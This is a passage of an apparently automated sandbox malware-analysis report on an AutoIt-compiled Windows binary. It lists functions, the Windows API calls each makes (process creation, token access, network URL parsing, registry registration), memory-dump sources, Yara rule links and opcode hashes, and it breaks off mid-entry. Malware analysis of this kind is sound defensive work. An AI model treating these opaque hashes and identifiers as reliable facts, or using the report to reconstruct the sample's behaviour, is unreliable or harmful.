                                                        • String ID:
                                                        • API String ID: 2875609808-0
                                                        • Opcode ID: c7d607a3675e8a2f0ae180d9ad16c7abdd0ce99c0b36c434941c715e72f303c7
                                                        • Instruction ID: 9f9d05fe72b93a794f52170d5ba17fc4d8f617e47521dca32e07fed3cd0a7733
                                                        • Opcode Fuzzy Hash: c7d607a3675e8a2f0ae180d9ad16c7abdd0ce99c0b36c434941c715e72f303c7
                                                        • Instruction Fuzzy Hash: 20115E35D0052DEBCF04DFA5E848AEEBBB8FF29711F014059EA45B2250CB7095B1CB96
                                                        Function 0011D831 Relevance: 6.0, APIs: 4, Instructions: 50registryCOMMON
                                                        Download Yara Rule
                                                        APIs
                                                        • GetModuleFileNameW.KERNEL32(?,?,00000104,00000000,00000000), ref: 0011D84D
                                                        • LoadTypeLibEx.OLEAUT32(?,00000002,?), ref: 0011D864
                                                        • RegisterTypeLib.OLEAUT32(?,?,00000000), ref: 0011D879
                                                        • RegisterTypeLibForUser.OLEAUT32(?,?,00000000), ref: 0011D897
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.2161814461.00000000000C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000C0000, based on PE: true
                                                        • Associated: 00000000.00000002.2161796787.00000000000C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2161863427.000000000014F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2161863427.0000000000174000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2161917801.000000000017E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2161935057.0000000000187000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_c0000_fFoOcuxK7M.jbxd
                                                        Similarity
                                                        • API ID: Type$Register$FileLoadModuleNameUser
                                                        • String ID:
                                                        • API String ID: 1352324309-0
                                                        • Opcode ID: f170ab565160212214f3bd5efe97baf6a1686ddcb36aed47cc806fffe3766e28
                                                        • Instruction ID: 0995c004dc59e5c187551b8eb03b06316e9835401b44a46afc806e8c5fa17175
                                                        • Opcode Fuzzy Hash: f170ab565160212214f3bd5efe97baf6a1686ddcb36aed47cc806fffe3766e28
                                                        • Instruction Fuzzy Hash: F3116DB5A05304EBE3248F50EC09FD3BBBCEB00B10F10857DEA16D6550D7B0EA899BA1
                                                        Function 000F6FB7 Relevance: 6.0, APIs: 4, Instructions: 48COMMONLIBRARYCODE
                                                        Download Yara Rule
                                                        APIs
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.2161814461.00000000000C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000C0000, based on PE: true
                                                        • Associated: 00000000.00000002.2161796787.00000000000C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2161863427.000000000014F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2161863427.0000000000174000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2161917801.000000000017E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2161935057.0000000000187000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_c0000_fFoOcuxK7M.jbxd
                                                        Similarity
                                                        • API ID: __cftoe_l__cftof_l__cftog_l__fltout2
                                                        • String ID:
                                                        • API String ID: 3016257755-0
                                                        • Opcode ID: a65d1881d29c7e947f5b32dbcea64912f89e558cad637ae539af3f1adf23f7b4
                                                        • Instruction ID: 6fb08b163362d3a5c865295c46a39fd68ceb309001cfe82c2786984b18050f9a
                                                        • Opcode Fuzzy Hash: a65d1881d29c7e947f5b32dbcea64912f89e558cad637ae539af3f1adf23f7b4
                                                        • Instruction Fuzzy Hash: BF01693204814EFBCF625E84DC05CEE3F62BF28350B588415FA1898831C637C9B1BB82
                                                        Function 0014B2C5 Relevance: 6.0, APIs: 4, Instructions: 47COMMON
                                                        Download Yara Rule
                                                        APIs
                                                        • GetWindowRect.USER32(?,?), ref: 0014B2E4
                                                        • ScreenToClient.USER32(?,?), ref: 0014B2FC
                                                        • ScreenToClient.USER32(?,?), ref: 0014B320
                                                        • InvalidateRect.USER32(?,?,?,?,?,?,?,?,?,?,?,?), ref: 0014B33B
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.2161814461.00000000000C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000C0000, based on PE: true
                                                        • Associated: 00000000.00000002.2161796787.00000000000C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2161863427.000000000014F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2161863427.0000000000174000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2161917801.000000000017E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2161935057.0000000000187000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_c0000_fFoOcuxK7M.jbxd
                                                        Similarity
                                                        • API ID: ClientRectScreen$InvalidateWindow
                                                        • String ID:
                                                        • API String ID: 357397906-0
                                                        • Opcode ID: 0cef0663dd5e052673b1b1a0ed1d6325b70ccd5eba97d6732255045c12c14eb8
                                                        • Instruction ID: bcbd6dd08f2b42a5c19cbabfb5c3c6f944fd8531797febcf37c8696967f7ec1e
                                                        • Opcode Fuzzy Hash: 0cef0663dd5e052673b1b1a0ed1d6325b70ccd5eba97d6732255045c12c14eb8
                                                        • Instruction Fuzzy Hash: B91143B9D00209EFDB41CFA9D8849EEBBF9FB09310F108166E914E3620D735AA658F50
                                                        Function 0014B635 Relevance: 6.0, APIs: 4, Instructions: 40processCOMMON
                                                        Download Yara Rule
                                                        APIs
                                                        • _memset.LIBCMT ref: 0014B644
                                                        • _memset.LIBCMT ref: 0014B653
                                                        • CreateProcessW.KERNEL32(00000000,?,00000000,00000000,00000000,00000020,00000000,00000000,00186F20,00186F64), ref: 0014B682
                                                        • CloseHandle.KERNEL32 ref: 0014B694
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.2161814461.00000000000C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000C0000, based on PE: true
                                                        • Associated: 00000000.00000002.2161796787.00000000000C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2161863427.000000000014F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2161863427.0000000000174000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2161917801.000000000017E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2161935057.0000000000187000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_c0000_fFoOcuxK7M.jbxd
                                                        Similarity
                                                        • API ID: _memset$CloseCreateHandleProcess
                                                        • String ID:
                                                        • API String ID: 3277943733-0
                                                        • Opcode ID: 71b1477b580e311d76640628311a29fcf46d140ad2a9eaf7e2d8026745703e06
                                                        • Instruction ID: 00d4418952af4d08b4857fa3a010b7ede5042b3e46f36ee6a6d0e1a8b8ef5464
                                                        • Opcode Fuzzy Hash: 71b1477b580e311d76640628311a29fcf46d140ad2a9eaf7e2d8026745703e06
                                                        • Instruction Fuzzy Hash: 1FF05EB2540304BEE2102B61BC5AFBB3A9CEB09795F004020BB08E96A2D7718D40CBA8
                                                        Function 00126BDA Relevance: 6.0, APIs: 4, Instructions: 33COMMON
                                                        Download Yara Rule
                                                        APIs
                                                        • EnterCriticalSection.KERNEL32(?), ref: 00126BE6
                                                          • Part of subcall function 001276C4: _memset.LIBCMT ref: 001276F9
                                                        • _memmove.LIBCMT ref: 00126C09
                                                        • _memset.LIBCMT ref: 00126C16
                                                        • LeaveCriticalSection.KERNEL32(?), ref: 00126C26
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.2161814461.00000000000C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000C0000, based on PE: true
                                                        • Associated: 00000000.00000002.2161796787.00000000000C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2161863427.000000000014F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2161863427.0000000000174000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2161917801.000000000017E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2161935057.0000000000187000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_c0000_fFoOcuxK7M.jbxd
                                                        Similarity
                                                        • API ID: CriticalSection_memset$EnterLeave_memmove
                                                        • String ID:
                                                        • API String ID: 48991266-0
                                                        • Opcode ID: f928a4bdb7a7ff8b6382522d796413b8b3315fbba302f44f583ed40858b87958
                                                        • Instruction ID: aa5ccda59d98bb26f0fb76a724c41b4b2abe1f112aaac37032de8747ac560cd6
                                                        • Opcode Fuzzy Hash: f928a4bdb7a7ff8b6382522d796413b8b3315fbba302f44f583ed40858b87958
                                                        • Instruction Fuzzy Hash: E4F0543A100110ABDF016F55EC85E8ABB29EF45320F048065FE086E267C771E851CBB4
                                                        Function 000C2218 Relevance: 6.0, APIs: 4, Instructions: 23COMMON
                                                        Download Yara Rule
                                                        APIs
                                                        • GetSysColor.USER32(00000008), ref: 000C2231
                                                        • SetTextColor.GDI32(?,000000FF), ref: 000C223B
                                                        • SetBkMode.GDI32(?,00000001), ref: 000C2250
                                                        • GetStockObject.GDI32(00000005), ref: 000C2258
                                                        • GetWindowDC.USER32(?,00000000), ref: 000FBE83
                                                        • GetPixel.GDI32(00000000,00000000,00000000), ref: 000FBE90
                                                        • GetPixel.GDI32(00000000,?,00000000), ref: 000FBEA9
                                                        • GetPixel.GDI32(00000000,00000000,?), ref: 000FBEC2
                                                        • GetPixel.GDI32(00000000,?,?), ref: 000FBEE2
                                                        • ReleaseDC.USER32(?,00000000), ref: 000FBEED
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.2161814461.00000000000C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000C0000, based on PE: true
                                                        • Associated: 00000000.00000002.2161796787.00000000000C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2161863427.000000000014F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2161863427.0000000000174000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2161917801.000000000017E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2161935057.0000000000187000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_c0000_fFoOcuxK7M.jbxd
                                                        Similarity
                                                        • API ID: Pixel$Color$ModeObjectReleaseStockTextWindow
                                                        • String ID:
                                                        • API String ID: 1946975507-0
                                                        • Opcode ID: f46f4b6710de09d3ffe0c5332fad8e68d6a36361618d1ab5d2a73fccccd262e0
                                                        • Instruction ID: 40f17a8e4f20dbd5f446a2b092eb33eb69a08cc08069b60e8847c422c1370b07
                                                        • Opcode Fuzzy Hash: f46f4b6710de09d3ffe0c5332fad8e68d6a36361618d1ab5d2a73fccccd262e0
                                                        • Instruction Fuzzy Hash: 74E03936104244EAEB615F64EC0DBE83B50EB06732F00836AFA69584F187B14981DF12
                                                        Function 00118712 Relevance: 6.0, APIs: 4, Instructions: 23threadCOMMON
                                                        Download Yara Rule
                                                        APIs
                                                        • GetCurrentThread.KERNEL32 ref: 0011871B
                                                        • OpenThreadToken.ADVAPI32(00000000,?,?,?,001182E6), ref: 00118722
                                                        • GetCurrentProcess.KERNEL32(00000028,?,?,?,?,001182E6), ref: 0011872F
                                                        • OpenProcessToken.ADVAPI32(00000000,?,?,?,001182E6), ref: 00118736
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.2161814461.00000000000C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000C0000, based on PE: true
                                                        • Associated: 00000000.00000002.2161796787.00000000000C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2161863427.000000000014F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2161863427.0000000000174000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2161917801.000000000017E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2161935057.0000000000187000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_c0000_fFoOcuxK7M.jbxd
                                                        Similarity
                                                        • API ID: CurrentOpenProcessThreadToken
                                                        • String ID:
                                                        • API String ID: 3974789173-0
                                                        • Opcode ID: 1540a9e7146e2d3ed817bd08138270cd5528010125d9535b474927a3c62a2347
                                                        • Instruction ID: f05564edacd31f177f690cc72cb37859ab3a6965411b468e0f08fc2f887b0a58
                                                        • Opcode Fuzzy Hash: 1540a9e7146e2d3ed817bd08138270cd5528010125d9535b474927a3c62a2347
                                                        • Instruction Fuzzy Hash: 69E0863A6112119BD7205FB45D0CB973BACEF52791F14883CF245CA0A0DB3484C2C750
                                                        Function 0011B2F3 Relevance: 5.5, APIs: 1, Strings: 2, Instructions: 241comCOMMON
                                                        Download Yara Rule
                                                        APIs
                                                        • OleSetContainedObject.OLE32(?,00000001), ref: 0011B4BE
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.2161814461.00000000000C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000C0000, based on PE: true
                                                        • Associated: 00000000.00000002.2161796787.00000000000C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2161863427.000000000014F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2161863427.0000000000174000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2161917801.000000000017E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2161935057.0000000000187000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_c0000_fFoOcuxK7M.jbxd
                                                        Similarity
                                                        • API ID: ContainedObject
                                                        • String ID: AutoIt3GUI$Container
                                                        • API String ID: 3565006973-3941886329
                                                        • Opcode ID: 3e5c2c4a281688aaf1605ecc14a2234ce97e7a9f435af1ca475127fc3952249a
                                                        • Instruction ID: d939de750c8b1634394848fb3ebd81c9862a04ad0c1dd8621f0840bff716933f
                                                        • Opcode Fuzzy Hash: 3e5c2c4a281688aaf1605ecc14a2234ce97e7a9f435af1ca475127fc3952249a
                                                        • Instruction Fuzzy Hash: EB915870604601AFDB58DF64C8C4AAABBF5FF49710F20856DF94ADB6A1DB70E881CB50
                                                        Function 0012AFAC Relevance: 5.5, APIs: 2, Strings: 1, Instructions: 201shareCOMMON
                                                        Download Yara Rule
                                                        APIs
                                                          • Part of subcall function 000DFC86: _wcscpy.LIBCMT ref: 000DFCA9
                                                          • Part of subcall function 000C9837: __itow.LIBCMT ref: 000C9862
                                                          • Part of subcall function 000C9837: __swprintf.LIBCMT ref: 000C98AC
                                                        • __wcsnicmp.LIBCMT ref: 0012B02D
                                                        • WNetUseConnectionW.MPR(00000000,?,?,00000000,?,?,00000100,?), ref: 0012B0F6
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.2161814461.00000000000C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000C0000, based on PE: true
                                                        • Associated: 00000000.00000002.2161796787.00000000000C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2161863427.000000000014F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2161863427.0000000000174000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2161917801.000000000017E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2161935057.0000000000187000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_c0000_fFoOcuxK7M.jbxd
                                                        Similarity
                                                        • API ID: Connection__itow__swprintf__wcsnicmp_wcscpy
                                                        • String ID: LPT
                                                        • API String ID: 3222508074-1350329615
                                                        • Opcode ID: b4f0d39ab3bcbc4dfd540c7fa735825dd52efea1151506231c2785f041abbd10
                                                        • Instruction ID: 3e0196f661e13fbb166bc52992184b9fcb064d29e242ee3d062a12e583b76a27
                                                        • Opcode Fuzzy Hash: b4f0d39ab3bcbc4dfd540c7fa735825dd52efea1151506231c2785f041abbd10
                                                        • Instruction Fuzzy Hash: 5E61A471A04225AFCB18DF94E895EEEB7B4FF08710F114069F916AB361DB30AE54CB54
                                                        Function 000D2957 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 144sleepCOMMON
                                                        Download Yara Rule
                                                        APIs
                                                        • Sleep.KERNEL32(00000000), ref: 000D2968
                                                        • GlobalMemoryStatusEx.KERNEL32(?), ref: 000D2981
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.2161814461.00000000000C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000C0000, based on PE: true
                                                        • Associated: 00000000.00000002.2161796787.00000000000C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2161863427.000000000014F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2161863427.0000000000174000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2161917801.000000000017E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2161935057.0000000000187000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_c0000_fFoOcuxK7M.jbxd
                                                        Similarity
                                                        • API ID: GlobalMemorySleepStatus
                                                        • String ID: @
                                                        • API String ID: 2783356886-2766056989
                                                        • Opcode ID: 1b4497981c73fd33eb3f881cdeae137ac67bbaae1d33af55c7911d8be0e60183
                                                        • Instruction ID: 590ddc836fffff7d6c7c60cda3b40cbcaa0e5134a2856797a82d6dc781c55802
                                                        • Opcode Fuzzy Hash: 1b4497981c73fd33eb3f881cdeae137ac67bbaae1d33af55c7911d8be0e60183
                                                        • Instruction Fuzzy Hash: 8E5125724187449BD320EF10DC86BAFBBE8FB89354F41885DF2D8421A2DF718569CB66
                                                        Function 00129734 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 138COMMON
                                                        Download Yara Rule
                                                        APIs
                                                          • Part of subcall function 000C4F0B: __fread_nolock.LIBCMT ref: 000C4F29
                                                        • _wcscmp.LIBCMT ref: 00129824
                                                        • _wcscmp.LIBCMT ref: 00129837
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.2161814461.00000000000C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000C0000, based on PE: true
                                                        • Associated: 00000000.00000002.2161796787.00000000000C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2161863427.000000000014F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2161863427.0000000000174000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2161917801.000000000017E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2161935057.0000000000187000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_c0000_fFoOcuxK7M.jbxd
                                                        Similarity
                                                        • API ID: _wcscmp$__fread_nolock
                                                        • String ID: FILE
                                                        • API String ID: 4029003684-3121273764
                                                        • Opcode ID: edb4e5e41e2297ffc9a94f058ccccb83a882b5f3d4a52a1d0ca04fef14535d1f
                                                        • Instruction ID: a9ee832e8c779c43eb5518079f954fa60975a4c3014dc9b1d67db3a4ab90d345
                                                        • Opcode Fuzzy Hash: edb4e5e41e2297ffc9a94f058ccccb83a882b5f3d4a52a1d0ca04fef14535d1f
                                                        • Instruction Fuzzy Hash: CD41B372A00219BADF209BA5DC45FEFBBBDEF85710F010479F904B7182DB71AA158B61
                                                        Function 0013258E Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 97networkCOMMON
                                                        Download Yara Rule
                                                        APIs
                                                        • _memset.LIBCMT ref: 0013259E
                                                        • InternetCrackUrlW.WININET(?,00000000,00000000,0000007C), ref: 001325D4
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.2161814461.00000000000C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000C0000, based on PE: true
                                                        • Associated: 00000000.00000002.2161796787.00000000000C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2161863427.000000000014F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2161863427.0000000000174000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2161917801.000000000017E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2161935057.0000000000187000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_c0000_fFoOcuxK7M.jbxd
                                                        Similarity
                                                        • API ID: CrackInternet_memset
                                                        • String ID: |
                                                        • API String ID: 1413715105-2343686810
                                                        • Opcode ID: d7ce809dc8d2ed1302ca768b8118e2851c2a8311ee778a4fdce34177327d34ab
                                                        • Instruction ID: e3477043f650bd9319d475191c48e8b0c189d94a3109a75e529586f46a72d8a8
                                                        • Opcode Fuzzy Hash: d7ce809dc8d2ed1302ca768b8118e2851c2a8311ee778a4fdce34177327d34ab
                                                        • Instruction Fuzzy Hash: A331F6B1904119ABCF05AFA1CC86EEEBFB8FF08310F104169ED19A6162EB315956DF60
                                                        Function 00147A71 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 97windowCOMMON
                                                        Download Yara Rule
                                                        APIs
                                                        • SendMessageW.USER32(?,00001132,00000000,?), ref: 00147B61
                                                        • SendMessageW.USER32(?,00001105,00000000,00000000), ref: 00147B76
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.2161814461.00000000000C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000C0000, based on PE: true
                                                        • Associated: 00000000.00000002.2161796787.00000000000C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2161863427.000000000014F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2161863427.0000000000174000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2161917801.000000000017E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2161935057.0000000000187000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_c0000_fFoOcuxK7M.jbxd
                                                        Similarity
                                                        • API ID: MessageSend
                                                        • String ID: '
                                                        • API String ID: 3850602802-1997036262
                                                        • Opcode ID: a92fa45e08d5432519f18c917cbb450c5fa557ace99eda8f74412146215b5041
                                                        • Instruction ID: 1bcb9a896228e6a6e7231defcc78f22bb0ee8a776b89ea1720e7f3ad48b719c0
                                                        • Opcode Fuzzy Hash: a92fa45e08d5432519f18c917cbb450c5fa557ace99eda8f74412146215b5041
                                                        • Instruction Fuzzy Hash: EF41F974A052099FDB14CF65C981BDABBB5FF09300F25456AE904EB3A1D770AA51CF90
                                                        Function 00146A63 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 95COMMON
                                                        Download Yara Rule
                                                        APIs
                                                        • DestroyWindow.USER32(?,?,?,?), ref: 00146B17
                                                        • MoveWindow.USER32(?,?,?,?,?,00000001,?,?,?), ref: 00146B53
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.2161814461.00000000000C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000C0000, based on PE: true
                                                        • Associated: 00000000.00000002.2161796787.00000000000C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2161863427.000000000014F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2161863427.0000000000174000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2161917801.000000000017E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2161935057.0000000000187000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_c0000_fFoOcuxK7M.jbxd
                                                        Similarity
                                                        • API ID: Window$DestroyMove
                                                        • String ID: static
                                                        • API String ID: 2139405536-2160076837
                                                        • Opcode ID: 51d78e33126d5050acc0947f7bac1cb4b0e643cb8c8c967e8fbade655fc63f97
                                                        • Instruction ID: e37e5e8e6f63cfafee1ee485deeb512ac5da01eaa32db49137ab504eeb1f6dad
                                                        • Opcode Fuzzy Hash: 51d78e33126d5050acc0947f7bac1cb4b0e643cb8c8c967e8fbade655fc63f97
                                                        • Instruction Fuzzy Hash: 8A316D71200604AEDB109F68CC81BFB77A9FF49768F10861DF9A5D71A1DB31AC91C761
                                                        Function 001228A2 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 88windowCOMMON
                                                        Download Yara Rule
                                                        APIs
                                                        • _memset.LIBCMT ref: 00122911
                                                        • GetMenuItemInfoW.USER32(?,?,00000000,00000030), ref: 0012294C
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.2161814461.00000000000C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000C0000, based on PE: true
                                                        • Associated: 00000000.00000002.2161796787.00000000000C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2161863427.000000000014F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2161863427.0000000000174000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2161917801.000000000017E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2161935057.0000000000187000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_c0000_fFoOcuxK7M.jbxd
                                                        Similarity
                                                        • API ID: InfoItemMenu_memset
                                                        • String ID: 0
                                                        • API String ID: 2223754486-4108050209
                                                        • Opcode ID: 70f478be1499279e0056a6b1191488ecfd70d1ed01d9706462689adb0ba50fdf
                                                        • Instruction ID: bac326773c2dbd24b9c8dc6d12b90b90174bd260bb26226ed89f8f9db5894d77
                                                        • Opcode Fuzzy Hash: 70f478be1499279e0056a6b1191488ecfd70d1ed01d9706462689adb0ba50fdf
                                                        • Instruction Fuzzy Hash: C731C331A00325BFEF28CF58E985BEEBBF9EF45358F140029ED85A61A1D7709990CB51
                                                        Function 001339E9 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 84COMMON
                                                        Download Yara Rule
                                                        APIs
                                                        • __snwprintf.LIBCMT ref: 00133A66
                                                          • Part of subcall function 000C7DE1: _memmove.LIBCMT ref: 000C7E22
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.2161814461.00000000000C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000C0000, based on PE: true
                                                        • Associated: 00000000.00000002.2161796787.00000000000C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2161863427.000000000014F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2161863427.0000000000174000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2161917801.000000000017E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2161935057.0000000000187000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_c0000_fFoOcuxK7M.jbxd
                                                        Similarity
                                                        • API ID: __snwprintf_memmove
                                                        • String ID: , $$AUTOITCALLVARIABLE%d
                                                        • API String ID: 3506404897-2584243854
                                                        • Opcode ID: d8b207ae89f2636c7983aef57d7f87baf766b1946970a00343299553d4767346
                                                        • Instruction ID: d9c66e9227941c05410a1a246c0560163e8e4f889e31ee07a8bf116ffb92e85d
                                                        • Opcode Fuzzy Hash: d8b207ae89f2636c7983aef57d7f87baf766b1946970a00343299553d4767346
                                                        • Instruction Fuzzy Hash: 9F219C30A00219AFCF14EF64CC86EEE77B5AF54310F504468F859AB282DB30EA42CB65
                                                        Function 001466D4 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 72windowCOMMON
                                                        Download Yara Rule
                                                        APIs
